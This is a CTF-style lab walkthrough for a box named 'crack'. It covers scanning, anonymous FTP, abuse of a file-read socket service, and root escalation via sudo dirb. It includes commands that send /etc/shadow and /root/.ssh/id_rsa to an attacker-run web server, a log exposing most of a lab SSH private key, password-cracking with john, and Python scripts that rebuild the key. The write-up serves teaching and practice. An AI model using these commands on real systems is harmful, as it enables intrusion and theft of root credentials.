[Lab Practice] From writing a socket client to sudo-dirb privilege escalation

admin · 2024-01-16 08:33:24 · 22 views · 12,707 characters · 42 min 21 s read

Lab Practice

Lab introduction

Name: crack

Difficulty: easy

Skills: Python script analysis, understanding sockets, writing a socket client script, using nc, using ftp, sudo-dirb privilege escalation, reading the shadow and id_rsa files with dirb

Information gathering

Host discovery


Port scanning

└─# nmap -sV -A -p- -T4 192.168.1.240
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-14 23:40 EST
Nmap scan report for 192.168.1.240
Host is up (0.00085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.158
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Jun 07  2023 upload [NSE: writeable]
4200/tcp  open  ssl/http ShellInABox
|_ssl-date: TLS randomness does not represent time
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after:  2043-06-02T10:20:13
12359/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     File to read:NOFile to read:
|   NULL: 
|_    File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.94%I=7%D=1/14%Time=65A4B747%P=x86_64-pc-linux-gnu%r(N
SF:ULL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:NOFi
SF:le\x20to\x20read:");
MAC Address: 08:00:27:77:7E:85 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 192.168.1.240

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.37 seconds

The scan shows only ports 21, 4200 and 12359 open. Port 4200 is a shell (ShellInABox), but we have no credentials for it, so it is set aside for now. Port 21 allows anonymous login, and inside we find a script.


ftp> ls
229 Entering Extended Passive Mode (|||32009|)
150 Here comes the directory listing.
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py

This code is a simple Python server: it uses the socket library to listen for connections on the given port (12359 here) and serves file-read requests. It receives a filename from the client, reads that file and sends the contents back; if the file does not exist it answers "NO". This is the service on port 12359. Note the extra condition in the code: a file is only returned if a file with the same basename also exists directly under / (check = "/" + filename), which is why a file of that name has to be placed first.

┌──(root㉿kali)-[~]
└─# cat crack.py
import os
import socket

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

# accept() is called once, outside the loop: one client per process
c, addr = s.accept()
no = "NO"
while True:
    try:
        c.send('File to read:'.encode())
        data = c.recv(1024)
        file = (str(data, 'utf-8').strip())
        filename = os.path.basename(file)
        check = "/"+filename
        # the file is served only if a file of the same name also exists in /
        if os.path.isfile(check) and os.path.isfile(file):
            f = open(file,"r")
            lines = f.readlines()
            lines = str(lines)       # the reply is the repr of the list of lines
            lines = lines.encode()
            c.send(lines)
        else:
            c.send(no.encode())
    except ConnectionResetError:
        pass

We will try to read the machine's /etc/passwd. To satisfy the check, we create a file named passwd and upload it to the FTP upload folder.


The contents of the passwd file are read successfully.


For convenience we can connect directly with nc:

nc 192.168.1.240 12359
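The skills list promises a socket client, but the post only shows the server and then falls back to nc. As an added example (my code, not the box's crack.py and not the author's script), here is a small Python client for the port-12359 protocol, together with a constructed stand-in server that speaks the same prompt/reply protocol but serves files from a temporary directory, so the whole exchange runs offline on localhost. The names FileReadClient, decode_reply, start_mock_server and demo are my own, and the passwd content is constructed.

```python
import ast
import os
import socket
import tempfile
import threading

PROMPT = b"File to read:"  # the banner crack.py sends before every request


class FileReadClient:
    """Client for the crack.py protocol: wait for the prompt, send a path,
    then collect everything up to the next prompt (the server never closes
    the connection itself, it just prompts again)."""

    def __init__(self, host, port, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self._read_until_prompt()  # swallow the initial "File to read:"

    def _read_until_prompt(self):
        buf = b""
        while not buf.endswith(PROMPT):
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            buf += chunk
        return buf[: -len(PROMPT)]

    def read(self, path):
        """Return the raw reply for path: "NO" or str(list_of_lines)."""
        self.sock.sendall(path.encode() + b"\n")
        return self._read_until_prompt().decode("utf-8", "replace")

    def close(self):
        self.sock.close()


def decode_reply(reply):
    """crack.py answers with str(f.readlines()); turn that back into the
    list of lines, or None when the server answered "NO"."""
    if reply == "NO":
        return None
    return ast.literal_eval(reply)


def start_mock_server(root_dir):
    """Constructed stand-in for crack.py (not the box's code): same protocol
    and the same single accept(), but paths are resolved under root_dir
    instead of / so the demo runs anywhere. Returns the chosen port."""
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    s.listen(5)
    port = s.getsockname()[1]

    def serve():
        c, _ = s.accept()  # one client per process, exactly like crack.py
        with c:
            while True:
                try:
                    c.send(PROMPT)
                    data = c.recv(1024)
                    if not data:
                        break
                    name = os.path.basename(str(data, "utf-8").strip())
                    target = os.path.join(root_dir, name)
                    if os.path.isfile(target):
                        with open(target) as f:
                            c.send(str(f.readlines()).encode())
                    else:
                        c.send(b"NO")
                except (ConnectionResetError, BrokenPipeError):
                    break
        s.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo(root_dir=None):
    """Plant a constructed passwd file, talk to the mock server over one
    connection and return (lines of passwd, result for a missing file)."""
    root_dir = root_dir or tempfile.mkdtemp()
    with open(os.path.join(root_dir, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "cris:x:1000:1000::/home/cris:/bin/bash\n")
    port = start_mock_server(root_dir)
    client = FileReadClient("127.0.0.1", port)
    found = decode_reply(client.read("/etc/passwd"))
    missing = decode_reply(client.read("/etc/does-not-exist"))
    client.close()
    return found, missing


if __name__ == "__main__":
    print(demo())
```

Two things the client makes visible. The server never closes the connection, it just sends the next "File to read:" prompt, so the only way to frame a reply is to read until that prompt appears (a file that itself contains the prompt string would break this framing). And it answers with str(f.readlines()), which is why ast.literal_eval is the right way to turn the reply back into lines. Also keep in mind that crack.py calls accept() only once: a second client connects but gets no prompt until the process is restarted.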


Gaining access

Reading the file gave us the username cris; logging in with cris/cris succeeded and gave us access to the system.


Privilege escalation

Running sudo -l to inspect the sudo configuration shows that dirb may be run as root. Anyone who has used Kali knows dirb is the directory brute-forcing tool that ships with Kali. So how do we use it to escalate privileges?


1. Start a web server on Kali with PHP, or with Python:

php -S 0.0.0.0:12345
python -m http.server

2. Run dirb with the shadow file as the wordlist. dirb requests every wordlist entry as a URL path, so each line of shadow reaches our web server as a request and lands in its log.


3. Crack the shadow file, but the cracking attempt failed:

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt


Try reading the id_rsa private key instead:

sudo -u root /usr/bin/dirb http://192.168.1.158:12345 /root/.ssh/id_rsa


└─# php -S 0.0.0.0:12345
[Mon Jan 15 03:09:37 2024] PHP 8.2.7 Development Server (http://0.0.0.0:12345) started
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 [404]: GET /randomfile1 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60870 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60870 [404]: GET /frand2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60870 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 [404]: GET /-----BEGIN - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 [404]: GET /b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60902 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60902 [404]: GET /NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60902 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60904 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60904 [404]: GET /b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60904 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60916 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60916 [404]: GET /xNQ8NxRO4/bC1v90lUrhyLi/ML5B4nak+5vLFJi8NlwXMQJ/xCWZg5+WOLduFp4VvHlwAf - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60916 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60932 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60932 [404]: GET /tDh2C+tJp2hqusW1jZRqSXspCfKLPt/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60932 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 [404]: GET //+FwJbMna8iPwmvK6n/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60950 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60950 [404]: GET /yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60950 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60956 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60956 [404]: GET /Kn2aZN/8xWAB+/t96TcXogtSbQw/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3/Cb34a/6v8c - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60956 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60970 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60970 [404]: GET /9rMjGl9HMZFDwswzAGrvPOeroVB/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60970 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60974 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60974 [404]: GET /EAAAGBAMQb0XtxB+u8vYyLdq8Gu/bbzw8Jm9lpmL/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60974 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60990 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60990 [404]: GET /Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60990 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32774 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32774 [404]: GET /wtb/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32774 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32780 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32780 [404]: GET /arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP/hcCWzJ2vI - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32780 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32784 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32784 [404]: GET /j8Jryup/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32784 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32796 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32796 [404]: GET /b2FK7qDomlEWLqc7scNuUWqNEm/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf/MVg - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32796 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32798 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32798 [404]: GET /Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN/wm9+Gv+r/HPazIxpfRzGR - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32798 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32810 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32810 [404]: GET /Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32810 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32820 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32820 [404]: GET /3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32820 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32832 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32832 [404]: GET /m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa/ - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32832 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32838 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32838 [404]: GET /a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR/3uSMN - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32838 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32840 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32840 [404]: GET /peiKDzLI/Y+QcQku/7GmUIV4ugP0fjMnz/XcXqe6GVNX/gvNeT6WfKPCzcaXiF4I2i228u - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32840 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32850 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32850 [404]: GET /TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32850 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32854 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32854 [404]: GET /TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf/yUyK04a6mhFg3kJzsxE+iDOVH28D - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32854 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32860 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32860 [404]: GET /Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32860 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32876 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32876 [404]: GET /wQDlr9NWE6q1BovNNobebvw44NdBRQE/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32876 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32886 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32886 [404]: GET /0MoSXZXiC/0/CSfe6Je7unnIzhiA85jSe/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32886 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32898 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32898 [404]: GET /1ROwaN5uL26gIgtf/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32898 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32902 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32902 [404]: GET /WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32902 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32916 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32916 [404]: GET /0sTQ3d/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32916 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32928 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32928 [404]: GET /DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32928 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32940 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32940 [404]: GET /Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32940 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32952 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32952 [404]: GET //RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32952 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32968 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32968 [404]: GET /oxY6YRERurpcyYuSa/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32968 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32974 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32974 [404]: GET /2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32974 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32980 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32980 [404]: GET /6xpD9lHWyp+ocD/meYC7V8aio/W9VxL25NlYwdFyCgecd/rIJQ+tGPXoqXIKrf5lVrVtFC - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32980 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32990 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32990 [404]: GET /s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32990 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 [404]: GET /-----END - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 Closing

Then pull the id_rsa out of the log with a regular expression and tidy it into the private-key format to get a complete id_rsa.

cat id_rsa | grep -oP '(?<=GET\s/).+?(?=\s-\sNo\ssuch)' > id_rsa.bak
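As an added example (my code, not from the post), the same extraction the author does with grep, done in Python and carried through to the "tidy it into the private-key format" step: the regex keeps exactly one slash so base64 lines beginning with "/" (like the "GET //+FwJ..." entry above) survive, dirb's own probe requests before -----BEGIN are dropped, and the header/footer words that the request line lost at its first space are put back after checking that the decoded body starts with the openssh-key-v1 magic (the key above starts with b3BlbnNzaC1rZXktdjE, which is that magic in base64). SAMPLE_LOG is constructed with a made-up 36-byte body, not a usable key; extract_paths and rebuild_key are my names. From the defender's side this is the same parse an incident responder runs over a captured access log to establish exactly what a sudo-dirb scan carried off the host.

```python
import base64
import re

# Constructed sample of the PHP dev-server log, modelled on the one above:
# the first entry is dirb's existence probe, the rest is the "wordlist"
# being requested line by line. The body decodes to the OpenSSH magic plus
# filler bytes; it is not a real key.
SAMPLE_LOG = """\
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 [404]: GET /randomfile1 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 [404]: GET /-----BEGIN - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 [404]: GET /b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZf// - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 [404]: GET ///79 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 [404]: GET /-----END - No such file or directory
"""

# One request per wordlist line. Only the first "/" belongs to the URL; any
# further slash is part of the base64 line itself, so capture after one "/".
REQUEST = re.compile(r"\[404\]: GET /(\S*) - No such file or directory")

OPENSSH_MAGIC = b"openssh-key-v1\x00"
HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
FOOTER = "-----END OPENSSH PRIVATE KEY-----"


def extract_paths(log_text):
    """Return the requested paths in log order, i.e. the wordlist's lines."""
    return [m.group(1) for m in REQUEST.finditer(log_text)]


def rebuild_key(paths):
    """Keep only the lines between the BEGIN and END markers, verify they
    decode to an OpenSSH private key, and restore the header/footer words
    that the request line dropped at its first space (assumed OpenSSH
    format; the magic check confirms it)."""
    try:
        start, end = paths.index("-----BEGIN"), paths.index("-----END")
    except ValueError:
        raise ValueError("log has no BEGIN/END markers") from None
    body = paths[start + 1:end]
    blob = base64.b64decode("".join(body), validate=True)
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("body does not decode to an OpenSSH private key")
    return [HEADER, *body, FOOTER]


if __name__ == "__main__":
    print("\n".join(rebuild_key(extract_paths(SAMPLE_LOG))))
```

rebuild_key raises rather than guessing when the markers are missing or the body does not decode, which is the failure mode you hit when a log was rotated mid-scan or a line was URL-encoded by a different server. For the real log the same two functions apply unchanged; only SAMPLE_LOG is a stand-in.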


Finally, copy or download id_rsa to our own machine and use it to log in as root, which succeeds.


End

Originally published on the WeChat official account 贝雷帽SEC: [Lab Practice] From writing a socket client to sudo-dirb privilege escalation

Source (CN-SEC 中文网, reposted with the original link preserved): https://cn-sec.com/archives/2397639.html
